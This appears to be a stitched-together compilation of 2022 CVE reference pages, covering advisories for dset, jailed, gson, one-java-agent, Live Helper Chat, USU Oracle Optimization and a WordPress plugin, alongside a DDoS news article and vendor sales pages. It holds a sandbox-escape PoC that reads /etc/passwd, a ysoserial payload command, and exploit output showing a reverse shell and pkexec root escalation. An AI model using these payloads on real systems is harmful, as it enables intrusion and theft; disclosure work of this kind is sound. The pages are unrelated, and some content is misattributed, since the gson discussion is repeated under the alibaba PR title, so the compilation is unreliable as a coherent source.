All versions of package dset are vulnerable to Prototype Pollution via 'dset/merge' mode, as the dset function checks for prototype pollution by validating if the top-level path contains __proto__, constructor or protorype. By crafting a malicious object, it is possible to bypass this check and achieve prototype pollution.

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as _proto_, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

*   Unsafe Object recursive merge
    
*   Property definition by path
    

**Unsafe Object recursive merge**

The logic of a vulnerable recursive merge function follows the following high-level model:

    merge (target, source)
    
      foreach property of source
    if property exists and is an object on both the target and the source
    
      merge(target[property], source[property])
    
    else
    
      target[property] = source[property]
    
    

When the source object contains a property named _proto_ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

**Property definition by path**

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to _proto_.myValue. myValue is then assigned to the prototype of the class of the object.

CVE-2022-25645: Prototype Pollution in org.webjars.npm:dset | CVE-2022-25645 | Snyk

All versions of package jailed are vulnerable to Sandbox Bypass via an exported alert() method which can access the main application. Exported methods are stored in the application.remote object.

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   **snyk-id**
    
    SNYK-JAVA-ORGWEBJARSBOWER-2441254
    
*   **published**
    
    6 Apr 2022
    
*   **disclosed**
    
    2 Feb 2022
    
*   **credit**
    
    Cristian-Alexandru Staicu, Abdullah Alhamdan
    

**How to fix?**

There is no fixed version for org.webjars.bower:jailed.

**Overview**

org.webjars.bower:jailed is an a small JavaScript library for running untrusted code in a sandbox.

Affected versions of this package are vulnerable to Sandbox Bypass via an exported alert() method which can access the main application. Exported methods are stored in the application.remote object.

###PoC

    //poc.js
    var jailed = require('jailed');
    var path = './jailed-plugin.js';
    
    var api = {
        alert: console.log
    };
    

    //jailed-plugin.js
    application.remote.alert(this.constructor.constructor("return process")().mainModule.require("child_process").execSync("cat /etc/passwd").toString());

CVE-2022-23923: Sandbox Bypass in org.webjars.bower:jailed | CVE-2022-23923 | Snyk

The package com.google.code.gson:gson before 2.8.9 are vulnerable to Deserialization of Untrusted Data via the writeReplace() method in internal classes, which may lead to DoS attacks.

**Conversation**

Adversaries might be able to forge data which can be abused for DoS attacks.
These classes are already writing a replacement JDK object during serialization
for a long time, so this change should not cause any issues.

 Marcono1234 deleted the marcono1234/java-deserialization-internal-classes branch

Oct 13, 2021

sakibguy added a commit to sakibguy/gson that referenced this issue

Oct 14, 2021

Prevent Java deserialization of internal classes (google#1991)

goodwinnk added a commit to JetBrains/kotlin that referenced this issue

Apr 11, 2022

goodwinnk added a commit to JetBrains/kotlin that referenced this issue

Apr 11, 2022

goodwinnk added a commit to JetBrains/kotlin that referenced this issue

Apr 12, 2022

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 14, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 14, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 15, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 15, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 15, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 15, 2022

 

Alefas pushed a commit to JetBrains/kotlin that referenced this issue

Apr 18, 2022

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 19, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 19, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 19, 2022

 

Alefas pushed a commit to JetBrains/kotlin that referenced this issue

Apr 20, 2022

max-kammerer pushed a commit to JetBrains/kotlin that referenced this issue

Apr 24, 2022

CVE-2022-25647: Prevent Java deserialization of internal classes by Marcono1234 · Pull Request #1991 · google/gson

All versions of package com.alibaba.oneagent:one-java-agent-plugin are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) using a specially crafted archive that holds directory traversal filenames (e.g. ../../evil.exe). The attacker can overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-25842: remove unused IOUtils.unzip by robberphex · Pull Request #29 · alibaba/one-java-agent

**Conversation**

Adversaries might be able to forge data which can be abused for DoS attacks.
These classes are already writing a replacement JDK object during serialization
for a long time, so this change should not cause any issues.

 Marcono1234 deleted the marcono1234/java-deserialization-internal-classes branch

Oct 13, 2021

sakibguy added a commit to sakibguy/gson that referenced this issue

Oct 14, 2021

Prevent Java deserialization of internal classes (google#1991)

cocreature added a commit to digital-asset/daml that referenced this issue

Jul 12, 2022

some people get unhappy about
google/gson#1991, the new version includes the
fix

changelog\_begin
changelog\_end

cocreature added a commit to digital-asset/daml that referenced this issue

Jul 13, 2022

some people get unhappy about
google/gson#1991, the new version includes the
fix

changelog\_begin
changelog\_end

garyverhaegen-da pushed a commit to digital-asset/daml that referenced this issue

Jul 15, 2022

 

some people get unhappy about
google/gson#1991, the new version includes the
fix

changelog\_begin
changelog\_end

garyverhaegen-da added a commit to digital-asset/daml that referenced this issue

Jul 15, 2022

 

some people get unhappy about
google/gson#1991, the new version includes the
fix

changelog\_begin
changelog\_end

Co-authored-by: Moritz Kiefer <moritz.kiefer@purelyfunctional.org>

The onslaught was delivered through HTTPS, which puts more strain on a target, and it suggests that attackers are getting more powerful.

A cryptocurrency platform was recently on the receiving end of one of the biggest distributed denial of service attacks ever recorded, after threat actors bombarded it with 15.3 million requests, the content-delivery network Cloudflare said.

DDoS attacks can be measured in several ways, including by the volume of data, the number of packets, or the number of requests sent each second. The current records are 3.4 terabits per second for volumetric DDoS's—which attempt to consume all bandwidth available to the target—and 809 million packets per second, and 17.2 million requests per second. The latter two records measure the power of application-layer attacks, which attempt to exhaust the computing resources of a target’s infrastructure.

Cloudflare's recent DDoS mitigation peaked at 15.3 million requests per second. While short of the record, the attack may have been more powerful, because it was delivered through HTTPS requests rather than the HTTP requests used in the record. Because HTTPS requests are much more compute-intensive, this new attack had the potential to put much more strain on the target.

The resources required to deliver the HTTPS request flood were also greater, indicating that DDoSers are growing increasingly powerful. Cloudflare said that the botnet responsible, comprising about 6,000 bots, has delivered payloads as high as 10 million requests per second. The attack originated from 112 countries, with about 15 percent of the firepower from Indonesia, followed by Russia, Brazil, India, Colombia, and the United States.

“Within those countries, the attack originated from over 1,300 different networks,” Cloudflare researchers Omer Yoachimik and Julien Desgats wrote. They said that the flood of traffic mainly came from data centers, as DDoSers move away from residential network ISPs to cloud computing ISPs. Top data center networks involved included the German provider Hetzner Online (Autonomous System Number 24940), Azteca Comunicaciones Colombia (ASN 262186), and OVH in France (ASN 16276). Other sources included home and small office routers.

“In this case, the attacker was using compromised servers on cloud hosting providers, some of which appear to be running Java-based applications. This is notable because of the recent discovery of a vulnerability (CVE-2022-21449) that can be used for authentication bypass in a wide range of Java-based applications,” Patrick Donahue, Cloudflare's VP of product, wrote in an email. “We also saw a significant number of MikroTik routers used in the attack, likely exploiting the same vulnerability that the Meris botnet did.”

The attack lasted about 15 seconds. Cloudflare mitigated it using systems in its network of data centers that automatically detect traffic spikes and quickly filter out the sources. Cloudflare didn’t identify the target except to say that it operated a crypto launchpad, a platform used to help fund decentralized finance projects.

The numbers underscore the arms race between attackers and defenders as each attempts to outdo the other. It won’t be surprising if a new record is set in the coming months.

_This story originally appeared on_ _Ars Technica__._

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   This startup wants to watch your brain
*   The artful, subdued translations of modern pop
*   Netflix doesn't need a password-sharing crackdown
*   How to revamp your workflow with block scheduling
*   The end of astronauts—and the rise of robots
*   👁️ Explore AI like never before with our new database
*   ✨ Optimize your home life with our Gear team’s best picks, from robot vacuums to affordable mattresses to smart speakers

One of the Most Powerful DDoS Attacks Ever Hits a Crypto Platform

Cross-site Scripting (XSS) in GitHub repository livehelperchat/livehelperchat prior to 3.99v. Attacker can execute malicious javascript on application.

**An attacker can execute malicious javascript in Live Helper Chat**

Low severity GitHub Reviewed Published Apr 30, 2022 • Updated May 3, 2022

GHSA-9hgc-wpc5-v8p9: An attacker can execute malicious javascript in Live Helper Chat

USU Oracle Optimization before 5.17 allows authenticated quantum users to achieve remote code execution because of /v2/quantum/save-data-upload-big-file Java deserialization. NOTE: this is not an Oracle Corporation product.

**Overview**

Quantum agent does require authentication to be downloaded.  
Quantum userscredentials can be retreived in plaintext on agent configuration file.

**Impact**

A user with "Quantum" profile can trigger an unsecure deserialization on server APIs leading to RCE shell as "smartcollector" user.  
"smartcollector" user can trivially escalate to root thanks to pkexec missconfiguration (please see attached bug).

**Details**

"Quantum" profiles can request /v2/quantum/save-data-upload-big-file API.

This API is waiting for a file that is deserialized with SerializationUtil class:

Pseudo-code:

     public class SerializationUtil
     {
       public static Object deserialize(String fileName) throws IOException, ClassNotFoundException {
         FileInputStream fis = new FileInputStream(fileName);
         BufferedInputStream bis = new BufferedInputStream(fis);
         ObjectInputStream ois = new ObjectInputStream(bis);
         Object obj = ois.readObject();
         ois.close();
         return obj;
       }
       ...
    

Unsecure Java deserialization is a common bug that is referenced in the TOP 10 Owasp:

(OWASP deserialization cheatsheets)\[https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html\]

By chainning Java gadgets it is possible to trigger execution on the server. The following blog post explain the basic concepts of gadgets:

(snyk.io java gadget chainning)\[https://snyk.io/blog/serialization-and-deserialization-in-java/\]

Gadget chained have been referenced in various tools allowing to quickly build payloads relying on dependencies. In our case we used ysoserial.

(https://github.com/frohoff/ysoserial)\[https://github.com/frohoff/ysoserial\]

By replacing the hibernate dependancy version in pom.xml with the one used on the server, we succeed to create valid payloads:

    		<dependency>
    		  <groupId>org.hibernate</groupId>
    		  <artifactId>hibernate-core</artifactId>
    -		  <version>5.0.7-final</verion>
    +		  <version>5.2.10-final</verion>
    		</dependency>
    

Once ysoserial is built (mvn clean package -DskipTests) it is possible to generate payloads:

    java -Dhibernate5 -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 '<your cmd>'
    

**Proof of Concept**

You can find here a python script that demonstrates the ability to establish a reverse shell (here to 127.0.0.1 4444).  
The Hibernate1 gadget chain payload has been encoded into base64.

Note: the encoded payload establish a reverse shell locally. For this proof of concept the script also should be executed locally.

The script require pwntools python framework.

*   install pwntools (pip install pwntools)
*   Copy python script from Appendix on the server.
*   Replace quantum credentials and URL with yours.
*   Then launch python script

It should result in remote code execution on server.

    $ python3 quantum_serialize_exploit.py
    [*] Try to authenticate to quantum
    [+] Authentcation succeed
    [*] Prepare reverse shell listener
    [+] Trying to bind to :: on port 4444: Done
    [+] Waiting for connections on :::4444: Got connection from ::ffff:127.0.0.1 on port 53112
    [*] Trigger unsecure deserialization
    [*] Switching to interactive mode
    $ id
    uid=1504(smartcollect) gid=1500(oinstall) groups=1500(oinstall),1504(smartcollect)
    $ pkexec id
    uid=0(root) gid=0(root) groups=0(root)
    

**Recommendation****Security Patch**

Upgrade to 5.17

**Workarounds**

We suggest to either use a more secure serialization or use a framework to validate user inputs before deserialization.

**References****Credits**

\[Orange CERT-CC\]\[ora\]  
Cyrille CHATRAS of \[Orange\]\[orange\] group  
\[ora\]: https://cert.orange.com/  
\[orange\]: https://www.orange.com/

**Timeline**

**Date reported:** September 29, 2021  
**Date fixed:** November 24, 2021

CVE-2022-29936: Build software better, together

Multiple (13x) Cross-Site Request Forgery (CSRF) vulnerabilities in WPKube's Subscribe To Comments Reloaded plugin <= 211130 on WordPress allows attackers to clean up Log archive, download system info file, plugin system settings, plugin options settings, generate a new key, reset all options, change notifications settings, management page settings, comment form settings, manage subscriptions > mass update settings, manage subscriptions > add a new subscription, update subscription, delete Subscription.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Subscribe to Comments Reloaded is a robust plugin that enables commenters to sign up for e-mail notification of subsequent entries. The plugin includes a full-featured subscription manager that your commenters can use to unsubscribe to certain posts or suspend all notifications. It solves most of the issues that affect Mark Jaquith’s version, using the latest WordPress features and functionality. Plus, allows administrators to enable a double opt-in mechanism, requiring users to confirm their subscription clicking on a link they will receive via email or even One Click Unsubscribe.

**Requirements**

*   WordPress 4.0 or higher
*   PHP 5.6 or higher
*   MySQL 5.x or higher

**Main Features**

*   Easily manage and search among your subscriptions
*   Imports Mark Jaquith’s Subscribe To Comments (and its clones) data
*   Messages are fully customizable, no poEdit required (and you can use HTML!) with a Rich Text Editor – WYSIWYG
*   Disable subscriptions for specific posts
*   One Click Unsubscribe
*   Get and Download your System information for better support.

**Language Localization**

If you would like to help out translating the plugin to your language you can do so through the official WordPress plugin translation system

1.  If you are using Subscribe To Comments by Mark Jaquith, disable it (no need to uninstall it, though)
2.  Upload the entire folder and all the subfolders to your WordPress plugins’ folder. You can also use the downloaded ZIP file to upload it.
3.  Activate it
4.  Customize the Permalink value under Settings > Subscribe to Comments > Management Page > Management URL. It **must** reflect your permalinks’ structure
5.  If you don’t see the checkbox to subscribe, you will have to manually edit your template, and add <?php global $wp_subscribe_reloaded; if (isset($wp_subscribe_reloaded)){ echo $wp_subscribe_reloaded->stcr->subscribe_reloaded_show(); } ?> somewhere in your comments.php
6.  If you’re upgrading from a previous version, please **make sure to deactivate/activate** StCR.
7.  You can always install the latest development version by taking a look at this Video

**Are there any video tutorials?**

Yeah, I have uploaded a few videos for the following topics:

1.  Issues Updating StCR via WordPress Update
2.  Issues with StCR links see StCR Clickable Links
3.  Issues with empty emails or management messages? see StCR Management Message
4.  Upgrading from the latest development version see Upgrading

**Why my notifications are not in HTML format?**

Don’t worry, just go to the Options tab an set to Yes the **Enable HTML emails** option.

**How can I reset all the plugin options?**

There is a new feature called **Safely Uninstall** that allow you to delete the plugin using the WordPress plugin interface. If you have the option set to **Yes** everything but the subscriptions created by the plugin will be wipeout. So after you made sure that you have this option to **Yes** you can deactivate the plugin and the delete it. Now you have to install the plugin via WordPress or Upload the plugin zip file and activate it, after this step all your settings will be as default and your subscriptions will remain.  
There is a new feature added on the Options tab where you can reset all the settings by using only one click. You can either wipe out all the subscriptions or keep them.

**What can I do if the \*\*Safely Uninstall\*\* does not have any value?**

Just deactivate and activate the plugin and you are all set. The default value will be **Yes**.

**Aaargh! Were did all my subscriptions go?**

No panic. If you upgraded from 1.6 or earlier to 2.0+, you need to deactivate/activate StCR, in order to update the DB structure. After the version 180212 a fix was applied so that you can see all the subscriptions.

**Can I customize the layout of the management page?**

Yes, each HTML tag has a CSS class or ID that you can use to change its position or look-and-feel.

**How do I disable subscriptions for a given post?**

Add a custom field called stcr_disable_subscriptions to it, with value ‘yes’

**How do I add the management page URL to my posts?**

Use the shortcode [subscribe-url], or use the following code in your theme:  
global $wp\_subscribe\_reloaded; if (isset($wp\_subscribe\_reloaded)){ echo ‘Subscribe“;

**Can I move the subscription checkbox to another position?**

Yes! Just disable the corresponding option under Settings > Comment Form and then add the following code where you want to display the checkbox:  
stcr->subscribe\_reloaded\_show(); } ?>

**What if after update to the version 141024 I still see plain HTML messages?**

The information of your configuration needs to be updated. Go to the Subscribe to Comments Reloaded settings and click the Save Changes button on the tab  
where you have you messages with HTML.

**How to generate a new Key for my Site?**

Just go to the Options Panel and click the generate button. By generating a new key you prevent the spam bots to steal your links.

People from my website, who made subscription for comments, said that in e-mail they get the IP of user, who left the comment. I\`m going to find another plugin.

I have the v.210315 I translated it into Italian 100% with Loco translated, but I noticed that in the plugin there are still many entries in English.

Just installed this as an alternative to setting up a forum, which seemed too much like hard work! Love it so far, very easy to set up and I like the fact that every item has a "?" so you can find out what it means before setting it.

Believe me guys, I tried all the plugins out there available for comment subscription and this is the only plugin that is robust, reliable and with continuous support from the author for a very long time. And guess what it's completely free. Thanks a lot for this wonderful plugin. All the best for your great success.

A fabulous plugin that helps people to stay engaged with the posts they appreciate much. Thank you!

If I had written design specs for a plugin and commissioned someone to write it, the result would not have been as good as this plugin is. Setting up this plugin it quickly becomes apparent that a lot of real-world experience has been incorporated into it over the years. The end result is, that it works like a dream and totally exceeds my expectations. Thanks so much!

Read all 156 reviews

“Subscribe To Comments Reloaded” is open source software. The following people have contributed to this plugin.

Contributors

*    WPKube

**v211130**

*   **Fix** Removed custom error handler (thanks to JakeQZ for bringing the issue to our attention)
*   **Fix** Processing form submission in subscribe.php is now stopped in case “subscribe without commenting” is enabled

**v211019**

*   **Fix** Issue with STCR output on non-virtual management page

**v210315**

*   **Fix** Removed the “need help” added via “contextual\_help” (deprecated)
*   **Fix** PHP 8 deprecated notice
*   **Fix** Fix issue with missing submit button when using “stcr\_disable\_subscription” custom field
*   **Tweak** Bump up WP “tested up to” version to 5.7

**v210126**

*   **New** Option to disable the “subscribe without commenting” and “request management link” pages. ( WP Admin > StCR > Management Page )

**v210110**

*   **Fix** Limit subscription types on the management page when only a specific subscription is allowed
*   **Fix** JS error on front-end

**v210104**

*   **New** Google reCAPTCHA now available for the “subscribe without commenting” and “request management subscription” form (WP admin > StCR > Options)
*   **Improvement** When using the checkbox (not the select box from advanced subscription) you can now select the subscription type (all or replies) (WP admin > StCR > Comment Form)
*   **Improvement** \[comment\_author\] can now be used in the Notification subject (WP admin > StCR > Notifications)
*   **Improvement** Replaced final instances of jQuery code to be raw JavaScript (not rely on jQuery)
*   **Fix** The form to “request management link” will now check if that email is a subscriber before sending a link
*   **Fix** Issue with broken option tooltips on Notifications settings page
*   **Tweak** Removed HTML comments around the plugin’s output on the frontend

**v200813**

*   **Fix** Error when permanently deleting a post/page/… (related to WP 5.5 change in the “delete\_post” hook coming with a 2nd parameter)

**v200629**

*   **New** Option to show the subscription checkbox/select only for logged in users (option called “Enable only for logged in users” and located in WP admin > StCR > Options)
*   **New** Added \[comment\_date\] and \[comment\_time\] shortcodes which can be used in the “notification message”.
*   **Improvement** Challenge question/answer now shows on “request management link” page as well
*   **Improvement** Replaced multiple instances of jQuery code to be raw JavaScript (not rely on jQuery)
*   **Tweak** Added label for the checkbox in “Screen Options”
*   **Tweak** Email input value fallback to “email” removed
*   **Fix** Subscriptions will no longer duplicate when post is copied/duplicated with the “Duplicate Post” plugin
*   **Fix** Fixed issue with PHP notice when $comment object does not have comment\_approved set
*   **Fix** The jQuery code that handles moving the position of the checkbox is now added later on in the code to avoid issue when jQuery gets loaded in the footer

**v200422**

*   **New** Arabic translation, thanks to Yaser Maadan
*   **Fix** WP\_PLUGIN\_URL replaced by plugins\_url()
*   **Fix** Issue with “generate new key” button for “StCR Unique Key” not working (WP Admin > StCR > Options)
*   **Fix** Issue with ordering by date in the subscription management table (WP Admin > StCR > Manage subscriptions)
*   **Fix** Issue with management page ( /comment-subscriptions/ ) being shown for child pages as well ( /comment-subscriptions/something-else/ )
*   **Fix** Corrections in Hungarian translation
*   **Tweak** Some other minor tweaks

**v200205**

*   **New** Function for developers to add subscribers. Check the guide
*   **New** Option to set a challenge (question + answer) for the “subscribe without commenting” form to prevent automatic bot submissions
*   **Fix** It is now possible to send out plain text emails instead of HTML emails. Check the guide
*   **Fix** It is now possible for visitors to subscribe to comments when the comments are only open for logged in users and the visitor is not logged in
*   **Fix** Corrections in German translation

**v191217**

*   **Improvement** Option to enable/disable the plugin from setting cookies (email address after subscription)
*   **Improvement** German translation improvements (thanks to Greendroid)

**v191209**

*   **Improvement** Logged in users no longer need to submit the “email” form on a subscription page in order to access their subscriptions
*   **Improvement** Ability to filter/search the subscriptions table ( WP admin > StCR > Manage Subscriptions ) when there are more than 1000 subscriptions

**v191028**

*   **Fix** Issue with “Default Checkbox Value” not being saved
*   **Fix** Issue with /comment-subscriptions taking to 404 ( when it does not end with / )
*   **Tweak** Error notification when \[manager\_link\] used in “Management Page message”.

**v191011**

*   **Fix** Revert changes to error logging due to PHP errors/warnings

**v191009**

*   **Fix** Issue with post slug being displayed instead of the post title on unsubscribe
*   **Fix** HTML validation error in subscribe template
*   **Fix** Fix German translation “Nicht abonnieren”
*   **Fix** Fix import data from Subscribe Reloaded by Mark Jaquith
*   **Fix** Issue with using double quotes in options
*   **Tweak** Show a message to the comment author to check his email to confirm subscription
*   **Tweak** Performance improvement for error logging

**v190529**

*   **Fix** Issue with being unable to dismiss admin notices shown by StCR
*   **Fix** Virtual management page was still being shown even when disabled

**v190523**

*   **Fix** Remove the old system information functionality

**v190510**

*   **New** Option to only enable the functionality for blog posts ( option named “Enable only for blog posts” located in WP admin > StCR > StCR Options)
*   **Tweak** Info on subscriber and subscriptions amount moved into separate table
*   **Fix** Text domain

**v190426**

*   **New** Info on the amount of subscribers and subscriptions added in WP admin > StCR > StCR System
*   **Fix** Text domain (for translations) has been changed to the correct domain (from subscribe-reloaded to subscribe-to-comments-reloaded)
*   **Fix** Issue with undefined is\_rtl function
*   **Fix** Missing blank space between sentences (below comment form when subscribed)
*   **Fix** Undefined variable notices for $order\_status and $order\_dt
*   **Fix** Temporarily hidden an unused option in StCR > Management Page to avoid confusion.
*   **Fix** Removed localization for non textual strings
*   **Fix** Fixed incorrectly localized textual strings

**v190412**

*   **Fix** Issue with JavaScript code that is supposed to show the form when “StCR Position” is enabled

**v190409**

*   **Fix** Post author was notified of new comments even if they are awaiting approval, no need for this since WordPress itself sends out an email in that case
*   **Fix** Post author was notified twice ( if he was subscribed and “subscribe authors” was enabled )
*   **Fix** Issue with “StCR Position” option ( for older/outdated themes ) not working properly
*   **Fix** Issue with wrong translation in German
*   **Tweak** The “Action” select box labels on “Manage Subscriptions” page tweaked to be more descriptive

**v190325**

*   **New** Shortcode for manage page content (to be used on non-virtual management page). The shortcode is \[stcr\_management\_page\]
*   **Rewrite** New method for downloading system information file
*   **Fix** The admin panel CSS and JavaScript files now load only on StCR pages
*   **Fix** Tooltips not showing up on System options page
*   **Fix** Conflict with MailChimp for WP plugin (comment filter received echo instead of return which caused the issue)
*   **Fix** Issue with select/deselect all on management page
*   **Tweak** The MySQL requirements info on the system page now uses WordPress requirements
*   **Tweak** The post author will no longer be notified of his/her own comments

**v190305**

*   **Fix** Issue with “Subscribe authors” functionality sending the emails to administrator instead of the post author

**v190214**

*   **Fix** String error calling the Curl Array.
*   **Fix** wrong array definition that was breaking the site in some newer PHP versions.
*   **Fix** error by calling $wp_locale that was not needed.
*   **Fix** wrong label on option issue #467.
*   **Fix** typo en help description issue #468.

**v190117**

*   **Fix** missing checkbox when the option **StCR Position** was set to **Yes**.
*   **Fix** styles on admin notices.
*   **Fix** filenames to match the correct menu name.
*   **Fix** \# issue#431 and issue#444.
*   **Fix** warning message that was notifying the server when the Management URL was empty. Now the field must have a value. Props @breezynetworks on WordPress Forum
*   **Fix** value of management page to get it on the event insteadof page load.
*   **Add** translation for Subs Table, Add PHP error logger.
*   **Add** Plugin information on Cards.
*   **Add** the Phing build script to automate the deployment and testings.
*   **Add** WebUI Popover library to display the help messages in a clear way.
*   **Add** dropdown menu on the options tab to include the System menu.
*   **Add** option to download the system report.
*   **Add** functionality to create the system report via Ajax.
*   **Add** cron to clean house the system report file.
*   **Upgrade** the **Comment Form** Panel 2 options.
*   **Upgrade** the **Management Page** panel.
*   **Upgrade** the **Options** Panel.
*   **Upgrade** the **Support** Panel.
*   **Upgrade** the **StCR System** Menu.
*   **Update** font awesome refrences.
*   **Update** Admin Menus with Bootstrap.
*   **Implement** Pagination using plugins and fix responsive layout of management page.
*   **Implement** SASS for the CSS files.
*   **Implement** a cache array for the menu options.
*   **Remove** unecessary components from Composer.
*   **Remove** double inclusion of Font Awesome.
*   **Modify** Bower, Gulp and Phing files to implement WebUI Popover.
*   **Refactor** the options saving process.
*   **Refactor** code to move the functional saving options to the Utils Class.
*   **Set** the Double Verification option to yes.
*   **Create** array of options for improve support.
*   **Sanitize** input and out of data preventing XSS. Code modification and suggestion by @jnorell.
*   **Re Word** option to avoid missleading to new users. Props @padraigobeirn.
*   **Move** the plugin core files to the folder **src** in order to implement npm and bower task managers.

**v180225**

*   **Fix** error when a user subscribe to a new post and the double opt-in was enable, preventing the double opt-in not sending the email message. Issue#350.
*   **Add** email and post id validation on the StCR backened.
*   **Add** email, search and post id validation on the frontend.
*   **Add** backened validation for input data (email) on the subscribe and request management pages.
*   **Add** debug messages to improve support.
*   **Add** feature to change the date format output on the management page for both the User page and Author. See issue#345.
*   **Remove** the inclusion of the plugin scripts with WP enqueue. This will load only the needed script on specific pages. Will remove request to the server to get scripts.

CVE-2022-29414: Subscribe To Comments Reloaded

Red Planet Laundry Management System 1.0 is vulnerable to SQL Injection.

**About Us**

We **Red Planet Computers** has started development in Laundry Management System in 2017. We have 7+ years experience in development, customization and implementation Web, Mobile application Services.

*   Well and Experienced Staff.
*   User Friendly Services
*   24x7 remote support servies

Our team have hands-on experience in all aspects of IT planning, deployment, operational management and maintenance support. Our design consultants design solutions that fit best within your environment and help achieve your laundry business goals – working with you as trusted advisors to help determine the best solution for your laundry business.

See More

**Development Skills**

**Laundry Management System Developed in following skills**

Our professional and experience developers team are used skill to the top most computer launguages and framworks for ui design, developement, making user friendly and secure laundry application for small business.

Boostrap & CSS _Website and Admin UI Design_

Javascript & Ajax _Website Development_

PHP Codeigniter & Mysqli _Website and Admin Panel_

Flutter, Swift and Kotlin _Android, iOS Mobile App_

**Screenshots**

Here some application UI screens to help you how its look and work LMS Application

*   Admin
*   Website
*   Mobile

**Pricing**

**RPL Standard Package  
(Point Of Sale\*)****INR 30K USD $399/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS Screen Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI
*   One Year Free Service & Updates.

Buy Now

**RPL Professional Package  
(E-Commerce\*)****INR 50K USD $649/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS+E-Comm Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI (Mobile, Website)
*   One Year Free Service & Updates.

Buy Now

**RPL Development Package  
(Customization\*\*)****Extra 50% POS+50% (OR) E-Commerce+50%**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS/E-Commerce Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI (Mobile, Website)         \[ as per your requirements\*\* \]
*   One Year Free Service & Updates.

Buy Now

\* Terms and Conditions apply (see FAQ section )  
\*\* Cost may vary depends on the customization

**Frequently Asked Questions**

Here are some of the most Frequently Asked Questions for Laundry Management Systems.

*   Can we get all liceses for lifetime ?
    
    Ans : Yes, if you purchase application with full source code then it's one-time payment and you will get multiple digital license \[lifetime\]. The amount is non-refundable , Once if you have got full source code then you will not getting return amount for any circumstances.
    
*   After purchase full source code can we sell this software ?
    
    Ans : Yes, after purchase application with full source code then you can use or sell anywhere with remove red planet computers company logo and name.
    
*   Can you will provide full source code ?
    
    Ans : Yes, you should have to pay 100% amount, if you want application with full source code. We will send full source code (zip or download link ) within half hours after successfully payment done. We will not provide any kind of equipment. Only RPL Business Package we will not provide source files.
    
*   What is **RPL Development / Customization Package** ?
    
    Ans : If you want manipulation or any changes in application through our professional developer team then you will have to pay selected (standard or professional) package amount plus extra 50% amount for manipulation charges. **Firstly, you have to pay 70% amount of total amount** and remaining 30% amount to pay after project completed, but note that in this period you will not getting full source code, you will getting our web hosting softwares link for testing, after completed project and 100% payment done then we will upload full source code in your website/web hosting server or send full source code link).  
